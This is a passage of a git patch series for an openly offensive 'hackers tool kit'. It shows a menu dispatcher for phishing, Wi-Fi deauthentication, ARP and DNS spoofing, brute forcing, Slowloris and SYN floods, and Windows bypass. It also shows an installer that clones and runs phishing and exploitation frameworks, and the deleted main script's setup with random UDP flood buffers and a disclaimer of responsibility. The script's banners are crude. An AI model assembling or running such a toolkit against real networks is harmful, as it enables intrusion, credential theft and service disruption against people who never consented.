udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + if x == "update": + update() + if x == "compilec": + compilec() + if x == "dnsspoof": + dnsspoof() + if x == "dnsspoofall": + dnsspoofall() + except: + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + found = True + +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# diff --git a/install.py b/install.py new file mode 100644 index 0000000..b428b14 --- /dev/null +++ b/install.py @@ -0,0 +1,63 @@ +import os +def install(): + os.system("apt update") + os.system("apt install python-tk") + os.system("apt install dirb -y") + os.system("apt install sslstrip -y") + os.system("apt install bettercap -y") + os.system("apt install sslscan -y") + os.system("apt install crunch -y") + os.system("apt install tcpdump -y") + os.system("apt install macchanger -y") + os.system("apt install wafw00f -y") + os.system("apt install medusa -y") + os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") + os.system("cd /root && git clone https://github.com/1N3/BruteX") + os.system("cd /root/BruteX && ./install.sh") + os.system("pip install mechanize") + os.system("pip install json") + os.system("pip install whois") + os.system("pip install python-whois") + os.system("pip install requests") + os.system("pip install bs4") + os.system("pip install tkinter") + os.system("pip install requests[socks]") + os.system("pip install urlparse") + os.system("pip install cookielib") + os.system("pip install scapy") + os.system("pip install datetime") + os.system("pip install argparse") + os.system("pip install re") + os.system("pip install threading") + os.system("pip install urllib2") + os.system("pip install modules") + os.system("pip install builtwith") + os.system("pip install smtplib") + os.system("pip install whois") + os.system("pip install builtwith") + os.system("pip install colorama") + os.system("pip install dnspython") + os.system("pip install shodan") + os.system("apt install python-socks -y") + os.system("apt install nmap -y") + os.system("apt install php -y") + os.system("apt install perl -y") + os.system("apt install hashcat -y") + os.system("apt install nc -y") + os.system("apt install neofetch -y") + os.system("apt install cupp -y") + os.system("gem install lolcat") + os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") + os.system("cd /root/kali-anonsurf && ./installer.sh") + print "\n" + print """entering big download region prepare you anus + if your not ready press ctrl C """ + i = raw_input("press ctrl c to stop hit enter to continue") + os.system("apt install metasploit-framework -y") + os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") + os.system("apt install wifite -y") + os.system("apt install reaver -y") + os.system("apt install aircrack-ng -y") + os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") + os.system("python /root/social-engineer-toolkit/setup.py install") +install() From 911051a9b0c83aa80746e1ffd1e2016e1136d872 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 1 Dec 2019 13:19:51 +0000 Subject: [PATCH 201/214] Delete htk.py --- htk.py | 3281 -------------------------------------------------------- 1 file changed, 3281 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index c79adab..0000000 --- a/htk.py +++ /dev/null @@ -1,3281 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @tuf_unkn0wn -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#WARNING START# -#-------------# -from tkinter import * -win = Tk() -warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' -messageVar = Message(win, text = warn) -messageVar.config(bg='red') -messageVar.pack( ) -win.title('HTK: Warning!') -button = Button(win, text='OK', width=25, command=win.destroy) -button.pack() -win.mainloop() -#-----------# -#WARNING END# - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -import readline -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ 